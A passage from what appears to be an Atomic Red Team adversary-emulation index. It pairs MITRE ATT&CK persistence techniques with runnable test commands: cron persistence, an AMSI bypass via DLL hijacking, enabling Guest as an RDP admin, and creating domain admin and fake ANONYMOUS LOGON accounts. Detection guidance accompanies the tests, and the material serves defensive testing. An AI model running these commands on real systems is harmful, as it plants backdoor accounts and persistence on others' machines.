- - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T12:44:28.199Z' - created: '2017-12-14T16:46:06.044Z' - x_mitre_is_subtechnique: false - x_mitre_contributors: - - Microsoft Threat Intelligence Center (MSTIC) - - Praetorian - x_mitre_version: '2.1' - x_mitre_data_sources: - - Office 365 account logs - - Azure activity logs - - AWS CloudTrail logs - - Process monitoring - - Process command-line parameters - - Authentication logs - - Windows event logs - x_mitre_detection: |- - Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary. - - Collect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure AD - - Azure - - Office 365 - x_mitre_permissions_required: - - Administrator - atomic_tests: [] - T1543: - technique: - external_references: - - source_name: mitre-attack - external_id: T1543 - url: https://attack.mitre.org/techniques/T1543 - - url: https://technet.microsoft.com/en-us/library/cc772408.aspx - description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. - source_name: TechNet Services - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html - description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved - July 10, 2017. - source_name: AppleDocs Launch Agent Daemons - - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf - description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical - OS X Malware Detection & Analysis. Retrieved July 10, 2017.' - source_name: OSX Malware Detection - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Create or Modify System Process - description: "Adversaries may create or modify system-level processes to repeatedly - execute malicious payloads as part of persistence. When operating systems - boot up, they can start processes that perform background system functions. - On Windows and Linux, these system processes are referred to as services. - (Citation: TechNet Services) On macOS, launchd processes known as [Launch - Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) - are run to finish system initialization and load user specific parameters.(Citation: - AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, - daemons, or agents that can be configured to execute at startup or a repeatable - interval in order to establish persistence. Similarly, adversaries may modify - existing services, daemons, or agents to achieve the same effect. \n\nServices, - daemons, or agents may be created with administrator privileges but executed - under root/SYSTEM privileges. Adversaries may leverage this functionality - to create or modify system processes in order to escalate privileges. (Citation: - OSX Malware Detection). " - id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-09T13:46:29.922Z' - created: '2020-01-10T16:03:18.865Z' - x_mitre_data_sources: - - Windows event logs - - Windows Registry - - File monitoring - - Process command-line parameters - - Process monitoring - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_detection: "Monitor for changes to system processes that do not correlate - with known software, patch cycles, etc., including by comparing results against - a trusted system baseline. New, benign system processes may be created during - installation of new software. Data and events should not be viewed in isolation, - but as part of a chain of behavior that could lead to other activities, such - as network connections made for Command and Control, learning details about - the environment through Discovery, and Lateral Movement. \n\nCommand-line - invocation of tools capable of modifying services may be unusual, depending - on how systems are typically used in a particular environment. Look for abnormal - process call trees from known services and for execution of other commands - that could relate to Discovery or other adversary techniques. \n\nMonitor - for changes to files associated with system-level processes." - x_mitre_platforms: - - Windows - - macOS - - Linux - atomic_tests: [] - T1053.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.003 - url: https://attack.mitre.org/techniques/T1053/003 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Cron - description: |- - Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. - - An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. cron can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. - id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-23T23:30:46.546Z' - created: '2019-12-03T14:25:00.538Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: false - x_mitre_permissions_required: - - User - x_mitre_detection: "Monitor scheduled task creation from common utilities using - command-line invocation. Legitimate scheduled tasks may be created during - installation of new software or through system administration functions. Look - for changes to tasks that do not correlate with known software, patch cycles, - etc. \n\nSuspicious program execution through scheduled tasks may show up - as outlier processes that have not been seen before when compared against - historical data. Data and events should not be viewed in isolation, but as - part of a chain of behavior that could lead to other activities, such as network - connections made for Command and Control, learning details about the environment - through Discovery, and Lateral Movement. " - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - x_mitre_platforms: - - Linux - - macOS - identifier: T1053.003 - atomic_tests: - - name: Cron - Replace crontab with referenced file - auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75 - description: 'This test replaces the current user''s crontab file with the contents - of the referenced file. This technique was used by numerous IoT automated - exploitation attacks. - -' - supported_platforms: - - macos - - linux - input_arguments: - command: - description: Command to execute - type: string - default: "/tmp/evil.sh" - tmp_cron: - description: Temporary reference file to hold evil cron schedule - type: path - default: "/tmp/persistevil" - executor: - name: bash - command: | - crontab -l > /tmp/notevil - echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} - cleanup_command: 'crontab /tmp/notevil - -' - - name: Cron - Add script to all cron subfolders - auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 - description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, - /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a - schedule. This technique was used by the threat actor Rocke during the exploitation - of Linux web servers. - -' - supported_platforms: - - macos - - linux - input_arguments: - command: - description: Command to execute - type: string - default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log - cron_script_name: - description: Name of file to store in cron folder - type: string - default: persistevil - executor: - elevation_required: true - name: bash - command: | - echo "#{command}" > /etc/cron.daily/#{cron_script_name} - echo "#{command}" > /etc/cron.hourly/#{cron_script_name} - echo "#{command}" > /etc/cron.monthly/#{cron_script_name} - echo "#{command}" > /etc/cron.weekly/#{cron_script_name} - cleanup_command: | - rm /etc/cron.daily/#{cron_script_name} - rm /etc/cron.hourly/#{cron_script_name} - rm /etc/cron.monthly/#{cron_script_name} - rm /etc/cron.weekly/#{cron_script_name} - - name: Cron - Add script to /var/spool/cron/crontabs/ folder - auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 - description: 'This test adds a script to a /var/spool/cron/crontabs folder configured - to execute on a schedule. This technique was used by the threat actor Rocke - during the exploitation of Linux web servers. - -' - supported_platforms: - - linux - input_arguments: - command: - description: Command to execute - type: string - default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log - cron_script_name: - description: Name of file to store in /var/spool/cron/crontabs folder - type: string - default: persistevil - executor: - elevation_required: true - name: bash - command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - -' - cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - -' - T1574.001: - technique: - created: '2020-03-13T18:11:08.357Z' - modified: '2020-03-26T16:13:58.862Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern - id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 - description: |- - Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. - - There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) - - Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking) - - If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. - Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. - name: DLL Search Order Hijacking - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.001 - url: https://attack.mitre.org/techniques/T1574/001 - - external_id: CAPEC-471 - source_name: capec - url: https://capec.mitre.org/data/definitions/471.html - - source_name: Microsoft Dynamic Link Library Search Order - url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN - description: Microsoft. (2018, May 31). Dynamic-Link Library Search Order. - Retrieved November 30, 2014. - - url: https://www.owasp.org/index.php/Binary_planting - description: OWASP. (2013, January 30). Binary planting. Retrieved June 7, - 2016. - source_name: OWASP Binary Planting - - source_name: Microsoft Security Advisory 2269637 - url: https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637 - description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved - March 13, 2020. - - source_name: Microsoft Dynamic-Link Library Redirection - url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN - description: Microsoft. (2018, May 31). Dynamic-Link Library Redirection. - Retrieved March 13, 2020. - - url: https://msdn.microsoft.com/en-US/library/aa375365 - description: Microsoft. (n.d.). Manifests. Retrieved December 5, 2014. - source_name: Microsoft Manifests - - source_name: FireEye DLL Search Order Hijacking - url: https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html - description: Nick Harbour. (2010, September 1). DLL Search Order Hijacking - Revisited. Retrieved March 13, 2020. - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - DLL monitoring - - File monitoring - x_mitre_detection: Monitor file systems for moving, renaming, replacing, or - modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared - with past behavior) that do not correlate with known software, patches, etc., - are suspicious. Monitor DLLs loaded into a process and detect DLLs that have - the same file name but abnormal paths. Modifications to or creation of .manifest - and .local redirection files that do not correlate with software updates are - suspicious. - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1574.001 - atomic_tests: - - name: DLL Search Order Hijacking - amsi.dll - auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 - description: | - Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) - https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ - - Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. - supported_platforms: - - windows - executor: - command: | - copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe - copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll - %APPDATA%\updater.exe -Command exit - cleanup_command: | - del %APPDATA%\updater.exe >nul 2>&1 - del %APPDATA%\amsi.dll >nul 2>&1 - name: command_prompt - elevation_required: true - T1574.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.002 - url: https://attack.mitre.org/techniques/T1574/002 - - external_id: CAPEC-641 - source_name: capec - url: https://capec.mitre.org/data/definitions/641.html - - source_name: About Side by Side Assemblies - url: https://docs.microsoft.com/en-us/windows/win32/sbscs/about-side-by-side-assemblies- - description: Microsoft. (2018, May 31). About Side-by-Side Assemblies. Retrieved - March 13, 2020. - - source_name: FireEye DLL Side-Loading - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf - description: 'Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in - the Side of the Anti-Virus Industry. Retrieved March 13, 2020.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: DLL Side-Loading - description: |- - Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program. - - Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: About Side by Side Assemblies) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable by replacing the legitimate DLL with a malicious one. (Citation: FireEye DLL Side-Loading) - - Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process. - id: attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-10-17T15:15:27.807Z' - created: '2020-03-13T19:41:37.908Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: Monitor processes for unusual activity (e.g., a process that - does not use the network begins to do so). Track DLL metadata, such as a hash, - and compare DLLs that are loaded at process execution time against previous - executions to detect differences that do not correlate with patching or updates. - x_mitre_data_sources: - - Loaded DLLs - - Process monitoring - - Process use of network - x_mitre_platforms: - - Windows - identifier: T1574.002 - atomic_tests: - - name: DLL Side-Loading using the Notepad++ GUP.exe binary - auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040 - description: | - GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. - Upon execution, calc.exe will be opened. - supported_platforms: - - windows - input_arguments: - process_name: - description: Name of the created process - type: string - default: calculator.exe - gup_executable: - description: GUP is an open source signed binary used by Notepad++ for software - updates - type: path - default: PathToAtomicsFolder\T1574.002\bin\GUP.exe - dependency_executor_name: powershell - dependencies: - - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - -' - prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" - executor: - command: "#{gup_executable}\n" - cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - -' - name: command_prompt - T1078.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1078.001 - url: https://attack.mitre.org/techniques/T1078/001 - - external_id: CAPEC-70 - source_name: capec - url: https://capec.mitre.org/data/definitions/70.html - - source_name: Microsoft Local Accounts Feb 2019 - url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts - description: Microsoft. (2018, December 9). Local Accounts. Retrieved February - 11, 2019. - - source_name: Metasploit SSH Module - url: https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh - description: undefined. (n.d.). Retrieved April 12, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Default Accounts - description: |- - Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.(Citation: Microsoft Local Accounts Feb 2019) - - Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module) - id: attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-09-16T19:41:43.491Z' - created: '2020-03-13T20:15:31.974Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Monitor whether default accounts have been activated or logged - into. These audits should also include checks on any appliances and applications - for default credentials or SSH keys, and if any are discovered, they should - be updated immediately. - x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS - identifier: T1078.001 - atomic_tests: - - name: Enable Guest account with RDP capability and admin priviliges - auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 - description: After execution the Default Guest account will be enabled (Active) - and added to Administrators and Remote Desktop Users Group, and desktop will - allow multiple RDP connections - supported_platforms: - - windows - input_arguments: - guest_user: - description: Specify the guest account - type: String - default: guest - guest_password: - description: Specify the guest password - type: String - default: Password123! - executor: - command: |- - net user #{guest_user} /active:yes - net user #{guest_user} #{guest_password} - net localgroup administrators #{guest_user} /add - net localgroup "Remote Desktop Users" #{guest_user} /add - reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f - reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f - cleanup_command: |- - net user #{guest_user} /active:no >nul 2>&1 - net localgroup administrators #{guest_user} /delete >nul 2>&1 - net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 - name: command_prompt - elevation_required: true - T1136.002: - technique: - created: '2020-01-28T14:05:17.825Z' - modified: '2020-03-23T18:12:36.696Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - type: attack-pattern - id: attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177 - description: |- - Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account. - - Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. - name: Domain Account - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1136.002 - url: https://attack.mitre.org/techniques/T1136/002 - - source_name: Microsoft User Creation Event - description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account - was created. Retrieved June 30, 2017.' - url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720 - x_mitre_platforms: - - Windows - - macOS - - Linux - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - Authentication logs - - Windows event logs - x_mitre_detection: 'Monitor for processes and command-line parameters associated - with domain account creation, such as net user /add /domain. - Collect data on account creation within a network. Event ID 4720 is generated - when a user account is created on a Windows domain controller. (Citation: - Microsoft User Creation Event) Perform regular audits of domain accounts to - detect suspicious accounts that may have been created by an adversary.' - x_mitre_permissions_required: - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1136.002 - atomic_tests: - - name: Create a new Windows domain admin user - auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 - description: 'Creates a new domain admin user in a command prompt. - -' - supported_platforms: - - windows - input_arguments: - username: - description: Username of the user to create - type: String - default: T1136.002_Admin - password: - description: Password of the user to create - type: String - default: T1136_pass123! - group: - description: Domain administrator group to which add the user to - type: String - default: Domain Admins - executor: - command: | - net user "#{username}" "#{password}" /add /domain - net group "#{group}" "#{username}" /add /domain - cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain - -' - name: command_prompt - elevation_required: false - - name: Create a new account similar to ANONYMOUS LOGON - auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 - description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt. - -' - supported_platforms: - - windows - input_arguments: - username: - description: Username of the user to create - type: String - default: ANONYMOUS LOGON - password: - description: Password of the user to create - type: String - default: T1136_pass123! - executor: - command: 'net user "#{username}" "#{password}" /add /domain - -' - cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain - -' - name: command_prompt - elevation_required: false - - name: Create a new Domain Account using PowerShell - auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 - description: 'Creates a new Domain User using the credentials of the Current - User - -' - supported_platforms: - - windows - input_arguments: - username: - description: Name of the Account to be created - type: String - default: T1136.002_Admin - password: - description: Password of the Account to be created - type: String - default: T1136_pass123! - executor: - command: | - $SamAccountName = '#{username}' - $AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force - Add-Type -AssemblyName System.DirectoryServices.AccountManagement - $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain) - $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context) - $User.SamAccountName = $SamAccountName - $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword) - $User.SetPassword($TempCred.GetNetworkCredential().Password) - $User.Enabled = $True - $User.PasswordNotRequired = $False - $User.DisplayName = $SamAccountName - $User.Save() - $User - cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain - -' - name: powershell - elevation_required: false - T1078.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1078.002 - url: https://attack.mitre.org/techniques/T1078/002 - - external_id: CAPEC-560 - source_name: capec - url: https://capec.mitre.org/data/definitions/560.html - - url: https://technet.microsoft.com/en-us/library/dn535501.aspx - description: Microsoft. (2016, April 15). Attractive Accounts for Credential - Theft. Retrieved June 3, 2016. - source_name: TechNet Credential Theft - - source_name: Microsoft AD Accounts - url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts - description: Microsoft. (2019, August 23). Active Directory Accounts. Retrieved - March 13, 2020. - - url: https://technet.microsoft.com/en-us/library/dn487457.aspx - description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved - June 3, 2016. - source_name: TechNet Audit Policy - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Domain Accounts - description: |- - Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) - - Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. - id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-09-16T19:42:11.787Z' - created: '2020-03-13T20:21:54.758Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: |- - Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). - - Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence. - x_mitre_data_sources: - - Authentication logs - - Process monitoring - x_mitre_platforms: - - Linux - - macOS - - Windows - atomic_tests: [] - T1574.004: - technique: - id: attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490 - description: |- - Adversaries may execute their own malicious payloads by hijacking ambiguous paths used to load libraries. Adversaries may plant trojan dynamic libraries, in a directory that will be searched by the operating system before the legitimate library specified by the victim program, so that their malicious library will be loaded into the victim program instead. MacOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. - - A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X) - - If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. - name: Dylib Hijacking - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.004 - url: https://attack.mitre.org/techniques/T1574/004 - - external_id: CAPEC-471 - source_name: capec - url: https://capec.mitre.org/data/definitions/471.html - - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf - description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved - July 10, 2017. - source_name: Writing Bad Malware for OSX - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T16:48:09.391Z' - created: '2020-03-16T15:23:30.896Z' - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: 'Objective-See''s Dylib Hijacking Scanner can be used to - detect potential cases of dylib hijacking. Monitor file systems for moving, - renaming, replacing, or modifying dylibs. Changes in the set of dylibs that - are loaded by a process (compared to past behavior) that do not correlate - with known software, patches, etc., are suspicious. Check the system for multiple - dylibs with the same name and monitor which versions have historically been - loaded into a process. ' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_defense_bypassed: - - Application control - atomic_tests: [] - T1546.014: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.014 - url: https://attack.mitre.org/techniques/T1546/014 - - source_name: xorrior emond Jan 2018 - url: https://www.xorrior.com/emond-persistence/ - description: Ross, Chris. (2018, January 17). Leveraging Emond on macOS For - Persistence. Retrieved September 10, 2019. - - source_name: magnusviri emond Apr 2016 - url: http://www.magnusviri.com/Mac/what-is-emond.html - description: Reynolds, James. (2016, April 7). What is emond?. Retrieved September - 10, 2019. - - source_name: sentinelone macos persist Jun 2019 - url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/ - description: Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. - Retrieved September 10, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Emond - description: |- - Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place. - - The rule files are in the plist format and define the name, event type, and action to take. 